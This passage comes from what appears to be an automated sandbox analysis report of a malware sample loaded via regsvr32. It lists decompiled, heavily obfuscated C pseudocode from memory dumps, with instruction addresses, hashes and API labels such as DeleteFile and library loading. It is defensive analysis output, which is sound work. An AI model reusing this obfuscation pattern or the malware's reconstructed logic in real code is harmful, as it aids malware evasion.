				_v16 = _v16 ^ 0x01c20365;
				_t113 = E003CD933(_v8, _v12, 0x3c14b0, _v20, _v16);
				_v16 = 0x11490;
				_v16 = _v16 >> 9;
				_v16 = _v16 ^ 0x0003524d;
				_v12 = 0xaba3e2;
				_v12 = _v12 + 0x7183;
				_v12 = _v12 ^ 0x00a00fbd;
				_v8 = 0xd564b7;
				_v8 = _v8 << 6;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x41e2772d;
				E003C5E83(_a4, _v16,  &_v548, _v8 * 0x7e, _v12, _v8);
				_v16 = 0xef2505;
				_v16 = _v16 + 0xcdea;
				_v16 = _v16 ^ 0x00ed8753;
				_v12 = 0xdfbdab;
				_v12 = _v12 * 0x2e;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 ^ 0x0001ed98;
				_v8 = 0x44e7d2;
				_v8 = _v8 | 0xc6a59760;
				_v8 = _v8 << 0xd;
				_v8 = _v8 ^ 0xbef2f6fc;
				E003C43D3(_v16, _v12, _v8, _t113);
				_v12 = 0x505a;
				_t128 = 0x2d;
				_v12 = _v12 / _t128;
				_v12 = _v12 ^ 0x7530f608;
				_v12 = _v12 ^ 0x753abf86;
				_v8 = 0x29edb7;
				_v8 = _v8 << 4;
				_v8 = _v8 ^ 0xc6c4acad;
				_v8 = _v8 ^ 0xc458f093;
				_t121 = E003DEE45(_v12, _v8,  &_v548); // executed
				return _t121;
			}

0x003d7a5d
0x003d7a60
0x003d7a63
0x003d7a64
0x003d7a65
0x003d7a6a
0x003d7a70
0x003d7a77
0x003d7a7e
0x003d7a85
0x003d7a89
0x003d7a90
0x003d7a9c
0x003d7a9f
0x003d7aa2
0x003d7aa6
0x003d7aad
0x003d7ab4
0x003d7ab8
0x003d7abf
0x003d7ac6
0x003d7acd
0x003d7ad4
0x003d7adb
0x003d7adf
0x003d7af7
0x003d7afc
0x003d7b06
0x003d7b0c
0x003d7b19
0x003d7b20
0x003d7b27
0x003d7b31
0x003d7b38
0x003d7b40
0x003d7b43
0x003d7b57
0x003d7b5c
0x003d7b63
0x003d7b6a
0x003d7b71
0x003d7b7d
0x003d7b80
0x003d7b84
0x003d7b8b
0x003d7b92
0x003d7b99
0x003d7b9d
0x003d7bad
0x003d7bb2
0x003d7bc0
0x003d7bc3
0x003d7bcc
0x003d7bd3
0x003d7bda
0x003d7be1
0x003d7be5
0x003d7bec
0x003d7bfa
0x003d7c06

Strings

-wA, xrefs: 003D7B43
x5f, xrefs: 003D7A90

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: -wA$x5f
API String ID: 4033686569-4055052422
Opcode ID: 3e36edfc5b4a3fc5f67d778118447b6e14f028e255955b49c365443fac3cdca4
Instruction ID: 60cad988253ebcefb82d18e38132848307f544675e9358773be58c53259bbd41
Opcode Fuzzy Hash: 3e36edfc5b4a3fc5f67d778118447b6e14f028e255955b49c365443fac3cdca4
Instruction Fuzzy Hash: C751DF76D0120CFBCB49DFE1C98A9DEBBB1AB54308F208189D511AA260D3B45B54DF80

Uniqueness

Uniqueness Score: -1.00%

Function 003CDF44 Relevance: 1.5, Strings: 1, Instructions: 279
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E003CDF44(signed int __ecx, void* __edx, intOrPtr _a4) {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t294;
				intOrPtr _t297;
				intOrPtr _t299;
				void* _t307;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t324;
				signed int _t326;
				intOrPtr _t327;
				void* _t345;
				signed int* _t350;

				_t317 = __ecx;
				_push(0);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t282);
				_v1056 = 0x12dd0;
				_t350 =  &(( &_v1080)[4]);
				_v1052 = 0x732db;
				_t284 = 0x1ecdb;
				_v1048 = 0x7a66b;
				_t345 = 0;
				_v1044 = 0x5e6cc;
				while(_t284 != 0xfac9) {
					if(_t284 == 0x1ecdb) {
						_v1072 = 0x336c88;
						_v1072 = _v1072 >> 8;
						_v1072 = _v1072 + 0xffffb82f;
						_v1072 = _v1072 ^ 0xffffebb2;
						_v1068 = 0x308857;
						_push(_t317);
						_push(_t317);
						_v1068 = _v1068 * 0x7d;
						_v1068 = _v1068 + 0x29a4;
						_v1068 = _v1068 ^ 0x17ba5bbf;
						_v1064 = 0x422902;
						_v1064 = _v1064 + 0xffffe29c;
						_v1064 = _v1064 ^ 0x25c63a2d;
						_v1064 = _v1064 ^ 0x258f62dd;
						_v1060 = 0x185d06;
						_v1060 = _v1060 + 0xffff2a5b;
						_v1060 = _v1060 ^ 0x0013867f;
						_v1076 = 0x37f4ea;
						_v1076 = _v1076 * 0x69;
						_v1076 = _v1076 | 0x8ddb1058;
						_v1076 = _v1076 ^ 0x9ff78623;
						_v1080 = 0xe4aeff;
						_v1080 = _v1080 ^ 0x8ad58359;
						_v1080 = _v1080 << 8;
						_v1080 = _v1080 >> 0xf;
						_v1080 = _v1080 ^ 0x000685d7;
						_t317 = _v1072;
						E003CD5B0(_t317,  &_v1040, _v1068, _v1064, _v1060, _v1076, _t317, _v1080);
						_t350 =  &(_t350[8]);
						_t284 = 0x9d496;
						continue;
					} else {
						if(_t284 == 0x726ce) {
							_v1068 = 0xf92c98;
							_t320 = 0x29;
							_v1068 = _v1068 * 0x15;
							_v1068 = _v1068 ^ 0x147448ae;
							_v1072 = 0xa30477;
							_v1072 = _v1072 / _t320;
							_v1072 = _v1072 ^ 0x000d1501;
							_v1080 = 0x86eb61;
							_v1080 = _v1080 + 0xffff4bd3;
							_v1080 = _v1080 + 0xa2b7;
							_v1080 = _v1080 ^ 0x008babc3;
							_v1076 = 0x5c8210;
							_v1076 = _v1076 << 6;
							_v1076 = _v1076 >> 0xc;
							_v1076 = _v1076 ^ 0x000d2d00;
							_t294 = E003CD933(_v1068, _v1072, 0x3c10d0, _v1080, _v1076);
							_v1064 = 0x1ceb3c;
							_v1064 = _v1064 + 0xffff3848;
							_v1064 = _v1064 ^ 0xcace2337;
							_t322 = 6;
							_v1064 = _v1064 / _t322;
							_v1064 = _v1064 ^ 0x21c6f9cc;
							_v1068 = 0x5535b9;
							_v1068 = _v1068 + 0xffff472e;
							_v1068 = _v1068 ^ 0x00542234;
							_v1076 = 0xdc13c7;
							_v1076 = _v1076 + 0xff6c;
							_v1076 = _v1076 + 0xffff31f4;
							_v1076 = _v1076 ^ 0x00d00241;
							_v1080 = 0x28a45c;
							_v1080 = _v1080 << 2;
							_v1080 = _v1080 >> 0xc;
							_v1080 = _v1080 + 0xffff01cf;
							_v1080 = _v1080 ^ 0xfff8ce7f;
							_v1072 = 0xb3890;
							_v1072 = _v1072 << 0xb;
							_v1072 = _v1072 ^ 0x59cc8a15;
							_t297 =  *0x3e2208; // 0x28e510
							_t299 =  *0x3e2208; // 0x28e510
							E003C5E26( &_v520,  &_v1040, _v1064, _t299 + 0x1c, _v1068, _v1076, _t294, 0x104, _v1080, _t297 + 0x22c, _v1072);
							_v1068 = 0x8be03f;
							_v1068 = _v1068 * 0x4c;
							_v1068 = _v1068 ^ 0x2981386d;
							_v1076 = 0xaba280;
							_v1076 = _v1076 >> 0xb;
							_v1076 = _v1076 ^ 0x90dedd10;
							_v1076 = _v1076 ^ 0x90d50cc8;
							_v1072 = 0xc3578a;
							_v1072 = _v1072 | 0x7d156a68;
							_v1072 = _v1072 ^ 0x7dd3f3a4;
							_t317 = _v1068;
							E003C43D3(_t317, _v1076, _v1072, _t294);
							_t350 =  &(_t350[0xf]);
							goto L6;
						} else {
							if(_t284 == 0x9d496) {
								_v1080 = 0x38fb6c;
								_v1080 = _v1080 + 0xffffd01b;
								_t324 = 0x6f;
								_v1080 = _v1080 / _t324;
								_v1080 = _v1080 << 0xd;
								_v1080 = _v1080 ^ 0x105f1a58;
								_v1064 = 0xc818ea;
								_v1064 = _v1064 | 0x40aa65b7;
								_v1064 = _v1064 + 0x9ab1;
								_v1064 = _v1064 + 0xffff1fa5;
								_v1064 = _v1064 ^ 0x40eadb18;
								_v1072 = 0x2afdec;
								_v1072 = _v1072 + 0xffff6a84;
								_v1072 = _v1072 ^ 0x0029c249;
								_v1076 = 0x445d11;
								_v1076 = _v1076 >> 0xf;
								_v1076 = _v1076 >> 0xe;
								_v1076 = _v1076 ^ 0x000a1eea;
								_t307 = E003CD933(_v1080, _v1064, 0x3c1020, _v1072, _v1076);
								_v1064 = 0xfa4d6d;
								_v1064 = _v1064 + 0xffff0d59;
								_v1064 = _v1064 >> 0xe;
								_v1064 = _v1064 ^ 0x00021d96;
								_v1076 = 0x851d64;
								_v1076 = _v1076 + 0x34d8;
								_v1076 = _v1076 + 0xfffff7a4;
								_v1076 = _v1076 ^ 0x0082df76;
								_v1080 = 0xd0c410;
								_v1080 = _v1080 << 0xc;
								_v1080 = _v1080 << 3;
								_t326 = 0x66;
								_v1080 = _v1080 / _t326;
								_v1080 = _v1080 ^ 0x00f347c1;
								_v1072 = 0x448b89;
								_v1072 = _v1072 << 4;
								_v1072 = _v1072 ^ 0x0449b3dc;
								_t327 =  *0x3e2208; // 0x28e510
								_t76 = _t327 + 0x1c; // 0x28e52c
								_t77 = _t327 + 0x22c; // 0x28e73c
								E003C2388(_v1064,  &_v520, _v1076, _v1080, _t307,  &_v1040, _v1072, _t77, _t76);
								_v1068 = 0xba0b28;
								_v1068 = _v1068 << 0xf;
								_v1068 = _v1068 ^ 0x0596fb4d;
								_v1072 = 0x1c3d77;
								_v1072 = _v1072 ^ 0xb05d15f7;
								_v1072 = _v1072 ^ 0xb04be5f8;
								_v1076 = 0x1737af;
								_v1076 = _v1076 ^ 0x6706525d;
								_v1076 = _v1076 ^ 0xe3b9b25f;
								_v1076 = _v1076 ^ 0x84acce15;
								_t317 = _v1068;
								E003C43D3(_t317, _v1072, _v1076, _t307);
								_t350 =  &(_t350[0xd]);
								L6:
								_t284 = 0xfac9;
								continue;
							}
						}
					}
					L10:
					__eflags = _t284 - 0x4f9b2;
					if(__eflags != 0) {
						continue;
					}
					return _t345;
				}
				_v1072 = 0x7fdd51;
				_v1072 = _v1072 << 2;
				_v1072 = _v1072 >> 0xe;
				_v1072 = _v1072 ^ 0x000490f5;
				_v1068 = 0xa0770f;
				_v1068 = _v1068 + 0xffffa658;
				_v1068 = _v1068 ^ 0x00a1511e;
				_v1080 = 0xaf62da;
				_v1080 = _v1080 ^ 0xdbbe593f;
				_v1080 = _v1080 << 0xe;
				_v1080 = _v1080 >> 9;
				_v1080 = _v1080 ^ 0x00230e15;
				_v1060 = 0x883528;
				_v1060 = _v1060 >> 0xe;
				_v1060 = _v1060 ^ 0x0007c73a;
				_push(_t317);
				_t286 = E003D8BA1(_v1072, _v1068, __eflags, 0, 0, _v1080,  &_v520, 0, _v1060); // executed
				_t350 =  &(_t350[7]);
				_t317 = 1;
				__eflags = _t286;
				_t284 = 0x4f9b2;
				_t345 =  !=  ? 1 : _t345;
				goto L10;
			}

0x003cdf44
0x003cdf50
0x003cdf51
0x003cdf58
0x003cdf59
0x003cdf5a
0x003cdf5f
0x003cdf67
0x003cdf6a
0x003cdf72
0x003cdf77
0x003cdf7f
0x003cdf81
0x003cdf8e
0x003cdf9e
0x003ce349
0x003ce355
0x003ce35a
0x003ce362
0x003ce36a
0x003ce377
0x003ce378
0x003ce379
0x003ce37d
0x003ce385
0x003ce38d
0x003ce395
0x003ce39d
0x003ce3a5
0x003ce3ad
0x003ce3b5
0x003ce3bd
0x003ce3c5
0x003ce3d2
0x003ce3d6
0x003ce3de
0x003ce3e6
0x003ce3ee
0x003ce3f6
0x003ce3fb
0x003ce400
0x003ce41d
0x003ce421
0x003ce426
0x003ce429
0x00000000
0x003cdfa4
0x003cdfa9
0x003ce174
0x003ce185
0x003ce186
0x003ce18a
0x003ce192
0x003ce1a0
0x003ce1a4
0x003ce1ac
0x003ce1b4
0x003ce1bc
0x003ce1c4
0x003ce1cc
0x003ce1d4
0x003ce1d9
0x003ce1de
0x003ce1fb
0x003ce200
0x003ce20a
0x003ce214
0x003ce222
0x003ce22e
0x003ce232
0x003ce23a
0x003ce242
0x003ce24a
0x003ce252
0x003ce25a
0x003ce262
0x003ce26a
0x003ce272
0x003ce27a
0x003ce27f
0x003ce284
0x003ce28c
0x003ce294
0x003ce29c
0x003ce2a1
0x003ce2ad
0x003ce2ca
0x003ce2dc
0x003ce2e1
0x003ce2ee
0x003ce2f2
0x003ce2fa
0x003ce302
0x003ce307
0x003ce30f
0x003ce317
0x003ce31f
0x003ce327
0x003ce338
0x003ce33c
0x003ce341
0x00000000
0x003cdfaf
0x003cdfb1
0x003cdfb7
0x003cdfc1
0x003cdfcf
0x003cdfd2
0x003cdfd6
0x003cdfdb
0x003cdfe3
0x003cdfeb
0x003cdff3
0x003cdffb
0x003ce003
0x003ce00b
0x003ce013
0x003ce01b
0x003ce023
0x003ce02b
0x003ce030
0x003ce035
0x003ce052
0x003ce057
0x003ce061
0x003ce06b
0x003ce070
0x003ce078
0x003ce080
0x003ce088
0x003ce090
0x003ce098
0x003ce0a0
0x003ce0a5
0x003ce0b0
0x003ce0b3
0x003ce0b7
0x003ce0bf
0x003ce0c7
0x003ce0cc
0x003ce0d4
0x003ce0da
0x003ce0de
0x003ce103
0x003ce108
0x003ce110
0x003ce115
0x003ce11d
0x003ce125
0x003ce12d
0x003ce135
0x003ce13d
0x003ce145
0x003ce14d
0x003ce15e
0x003ce162
0x003ce167
0x003ce16a
0x003ce16a
0x00000000
0x003ce16a
0x003cdfb1
0x003cdfa9
0x003ce4ca
0x003ce4ca
0x003ce4cf
0x00000000
0x00000000
0x003ce4e1
0x003ce4e1
0x003ce430
0x003ce43f
0x003ce444
0x003ce449
0x003ce451
0x003ce459
0x003ce461
0x003ce469
0x003ce471
0x003ce479
0x003ce47e
0x003ce483
0x003ce48b
0x003ce493
0x003ce498
0x003ce4a0
0x003ce4b5
0x003ce4bc
0x003ce4bf
0x003ce4c0
0x003ce4c2
0x003ce4c7
0x00000000

Strings

4"T, xrefs: 003CE24A

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 4"T
API String ID: 0-395790227
Opcode ID: 2b2857aa7f7589b8c52cda0ee0338a2f427be196c7da5cfd953a567b7ccab631
Instruction ID: af926cb2ffc739f5be48bc819be9a228a3ccd340d748a7ea8b84ad7a311092f7
Opcode Fuzzy Hash: 2b2857aa7f7589b8c52cda0ee0338a2f427be196c7da5cfd953a567b7ccab631
Instruction Fuzzy Hash: 8EE100B10083429FC359CF61C88991BBBE0FBD9758F104A1CF19696261D3B5DA4ACF87

Uniqueness

Uniqueness Score: -1.00%

Function 10021DEA Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10021DEA() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E10021DA4); // executed
				 *0x10095184 = _t1;
				return _t1;
			}

0x10021def
0x10021df5
0x10021dfa

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 10021DEF

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6eaf8b27041a3461fd1d6e21b7508523a0e72d455ac337a076f85537c89378ec
Instruction ID: 83f2d49e3177c391f82b0c06b82b797f4172ff855fd19ef91394d3bc3ee36ed6
Opcode Fuzzy Hash: 6eaf8b27041a3461fd1d6e21b7508523a0e72d455ac337a076f85537c89378ec
Instruction Fuzzy Hash: 69A002B9812225DFFB58DF71DD985C83B61FE943077541167EA09C5328DF711101AB16

Uniqueness

Uniqueness Score: -1.00%

Function 10021DFC Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 10021E01

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 418686795ff9f4918a35b7e8cf050a6a121400acbeede60cddde29fd7fa26739
Instruction ID: d752007fa89770a928c379dfa53b2be5d68496a8e026d88f86f6dc83d2a11251
Opcode Fuzzy Hash: 418686795ff9f4918a35b7e8cf050a6a121400acbeede60cddde29fd7fa26739
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 003C5AC9 Relevance: 1.3, Strings: 1, Instructions: 99
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E003C5AC9(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t113;
				intOrPtr _t115;
				intOrPtr _t125;
				signed int _t126;
				signed int _t127;
				signed int _t142;
				signed int _t143;

				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x19e97;
				_v32 = 0xf4ed1;
				_v16 = 0x9b219b;
				_v16 = _v16 << 5;
				_v16 = _v16 + 0x9ec2;
				_t142 = 0x5b;
				_v16 = _v16 / _t142;
				_v16 = _v16 ^ 0x0038a614;
				_v12 = 0x7b230c;
				_t143 = 0x1d;
				_v12 = _v12 / _t143;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xffff18ac;
				_v12 = _v12 ^ 0xfff40f15;
				_v20 = 0xf1c42c;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 ^ 0xf8d3c668;
				_v20 = _v20 ^ 0xf8d73c1f;
				_v8 = 0xf2e51c;
				_v8 = _v8 ^ 0x5dac3591;
				_v8 = _v8 + 0xffffa349;
				_v8 = _v8 ^ 0x4a57d3c6;
				_v8 = _v8 ^ 0x170d7431;
				_t113 = E003CD933(_v16, _v12, __ecx, _v20, _v8);
				_v16 = 0x40e59b;
				_v16 = _v16 >> 4;
				_v16 = _v16 << 1;
				_v16 = _v16 ^ 0x000b71a7;
				_v12 = 0xecbdf2;
				_v12 = _v12 + 0x7422;
				_v12 = _v12 ^ 0x00e9e790;
				_v20 = 0xffef18;
				_v20 = _v20 + 0xffff5c5e;
				_v20 = _v20 * 0x7c;
				_v20 = _v20 ^ 0x7baf5347;
				_t115 = E003CD670(_v16, _v12, _v20, _t113);
				_t125 =  *0x3e2218; // 0x260d68
				 *((intOrPtr*)(_t125 + __edx * 4)) = _t115;
				_v20 = 0xfd948e;
				_v20 = _v20 ^ 0xd1367d16;
				_v20 = _v20 >> 7;
				_v20 = _v20 ^ 0x01a89adb;
				_v16 = 0xef2e6;
				_t126 = 0x36;
				_v16 = _v16 / _t126;
				_v16 = _v16 * 0x25;
				_v16 = _v16 ^ 0xe083f7c0;
				_v16 = _v16 ^ 0xe08ce5d1;
				_v12 = 0x5abcda;
				_t127 = 0x31;
				_v12 = _v12 / _t127;
				_v12 = _v12 ^ 0x0007ca6f;
				return E003C43D3(_v20, _v16, _v12, _t113);
			}

0x003c5acf
0x003c5ad3
0x003c5ad7
0x003c5ade
0x003c5ae5
0x003c5aec
0x003c5af0
0x003c5b02
0x003c5b07
0x003c5b0c
0x003c5b13
0x003c5b1d
0x003c5b20
0x003c5b23
0x003c5b27
0x003c5b2e
0x003c5b35
0x003c5b3c
0x003c5b40
0x003c5b47
0x003c5b4e
0x003c5b55
0x003c5b5c
0x003c5b63
0x003c5b6a
0x003c5b7e
0x003c5b83
0x003c5b8c
0x003c5b90
0x003c5b93
0x003c5b9a
0x003c5ba1
0x003c5ba8
0x003c5baf
0x003c5bb6
0x003c5bc2
0x003c5bc5
0x003c5bd5
0x003c5bda
0x003c5be4
0x003c5be7
0x003c5bee
0x003c5bf5
0x003c5bf9
0x003c5c00
0x003c5c0a
0x003c5c0f
0x003c5c16
0x003c5c19
0x003c5c20
0x003c5c29
0x003c5c33
0x003c5c37
0x003c5c3a
0x003c5c57

Strings

h&, xrefs: 003C5BDA

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: h&
API String ID: 1029625771-3727079482
Opcode ID: c0effc825d422bf0c3e2b0f836f81dedb6e53093eb6098d38e40fbc08258a204
Instruction ID: b23723a9fdf18953459a56b9bbb7ba8674ff56d5cfbbc61e2bdea5608e857fec
Opcode Fuzzy Hash: c0effc825d422bf0c3e2b0f836f81dedb6e53093eb6098d38e40fbc08258a204
Instruction Fuzzy Hash: 4841E1B5D0021DABDB08DFA5C84A9EEBBB1FB84318F10C599D021AA264D7B91B55CF80

Uniqueness

Uniqueness Score: -1.00%

Function 10065239 Relevance: 15.1, APIs: 10, Instructions: 99
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E10065239() {
				void* __ecx;
				struct _CRITICAL_SECTION* _t36;
				void* _t37;
				struct _CRITICAL_SECTION* _t42;
				signed char* _t58;
				void* _t61;
				void* _t63;
				void* _t65;
				signed int _t70;
				void* _t71;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;

				_t71 = _t65;
				_t1 = _t71 + 0x1c; // 0x10094e64
				_t36 = _t1;
				 *(_t74 + 0x14) = _t36;
				EnterCriticalSection(_t36);
				_t3 = _t71 + 4; // 0x20
				_t72 =  *_t3;
				_t4 = _t71 + 8; // 0x3
				_t70 =  *_t4;
				if(_t70 >= _t72) {
					L2:
					_t70 = 1;
					if(_t72 <= _t70) {
						L7:
						_t13 = _t71 + 0x10; // 0x260c58
						_t37 =  *_t13;
						_t73 = _t72 + 0x20;
						if(_t37 != 0) {
							_t61 = GlobalHandle(_t37);
							GlobalUnlock(_t61);
							_t42 = GlobalReAlloc(_t61, _t73 << 3, 0x2002);
						} else {
							_t42 = GlobalAlloc(0x2002, _t73 << 3); // executed
						}
						 *(_t74 + 0x10) = _t42;
						if(_t42 == 0) {
							_t15 = _t71 + 0x10; // 0x260c58
							GlobalLock(GlobalHandle( *_t15));
							LeaveCriticalSection( *(_t74 + 0x14));
							E1003743B(_t65);
						}
						_t63 = GlobalLock( *(_t74 + 0x10));
						_t18 = _t71 + 4; // 0x20
						E1001AB60(_t63 +  *_t18 * 8, 0,  *_t18 * 0x1fffffff + _t73 << 3);
						_t74 = _t74 + 0xc;
						 *(_t71 + 0x10) = _t63;
						 *(_t71 + 4) = _t73;
					} else {
						_t10 = _t71 + 0x10; // 0x260c58
						_t58 =  *_t10 + 8;
						while(( *_t58 & 0x00000001) != 0) {
							_t70 = _t70 + 1;
							_t58 =  &(_t58[8]);
							if(_t70 < _t72) {
								continue;
							}
							break;
						}
						if(_t70 >= _t72) {
							goto L7;
						}
					}
				} else {
					_t5 = _t71 + 0x10; // 0x260c58
					if(( *( *_t5 + _t70 * 8) & 0x00000001) != 0) {
						goto L2;
					}
				}
				_t23 = _t71 + 0xc; // 0x3
				if(_t70 >=  *_t23) {
					_t24 = _t70 + 1; // 0x4
					 *((intOrPtr*)(_t71 + 0xc)) = _t24;
				}
				_t26 = _t71 + 0x10; // 0x260c58
				 *( *_t26 + _t70 * 8) =  *( *_t26 + _t70 * 8) | 0x00000001;
				_t34 = _t70 + 1; // 0x4
				 *(_t71 + 8) = _t34;
				LeaveCriticalSection( *(_t74 + 0x10));
				return _t70;
			}

0x1006523d
0x10065240
0x10065240
0x10065244
0x10065248
0x1006524e
0x1006524e
0x10065251
0x10065251
0x10065256
0x10065265
0x10065267
0x1006526a
0x10065287
0x10065287
0x10065287
0x1006528a
0x10065290
0x100652ac
0x100652af
0x100652c1
0x10065292
0x1006529d
0x1006529d
0x100652cd
0x100652d3
0x100652d5
0x100652df
0x100652e5
0x100652eb
0x100652eb
0x100652f6
0x100652f8
0x1006530f
0x10065314
0x10065317
0x1006531a
0x1006526c
0x1006526c
0x1006526f
0x10065272
0x10065277
0x10065278
0x1006527d
0x00000000
0x00000000
0x00000000
0x1006527d
0x10065281
0x00000000
0x00000000
0x10065281
0x10065258
0x10065258
0x1006525f
0x00000000
0x00000000
0x1006525f
0x1006531e
0x10065321
0x10065323
0x10065326
0x10065326
0x10065329
0x1006532c
0x10065337
0x1006533a
0x1006533d
